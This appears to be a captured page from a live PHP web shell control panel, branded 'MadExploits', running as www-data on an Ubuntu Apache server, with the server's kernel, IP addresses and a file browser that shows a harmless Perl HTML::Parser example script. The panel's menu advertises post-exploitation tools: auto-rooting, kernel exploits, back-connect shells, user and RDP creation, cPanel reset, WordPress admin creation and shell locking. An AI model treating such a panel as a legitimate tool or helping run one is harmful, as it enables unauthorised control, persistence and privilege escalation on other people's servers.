Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.158.36
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libhtml-parser-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1.06
KB
-rw-r--r--
hanchors
1.14
KB
-rwxr-xr-x
hdump
683
B
-rwxr-xr-x
hform
1.87
KB
-rwxr-xr-x
hlc
710
B
-rwxr-xr-x
hrefsub
2.72
KB
-rwxr-xr-x
hstrip
1.74
KB
-rwxr-xr-x
htext
575
B
-rwxr-xr-x
htextsub
955
B
-rwxr-xr-x
htitle
434
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hdump
#!/usr/bin/perl -w # This script will output event information as it parses the HTML document. # This gives the user a "Parser's eye view" of an HTML document. use HTML::Parser (); use Data::Dump (); sub h { my($event, $line, $column, $text, $tagname, $attr) = @_; my @d = (uc(substr($event,0,1)) . " L$line C$column"); substr($text, 40) = "..." if length($text) > 40; push(@d, $text); push(@d, $tagname) if defined $tagname; push(@d, $attr) if $attr; print Data::Dump::dump(@d), "\n"; } my $p = HTML::Parser->new(api_version => 3); $p->handler(default => \&h, "event, line, column, text, tagname, attr"); $p->parse_file(@ARGV ? shift : *STDIN);
Close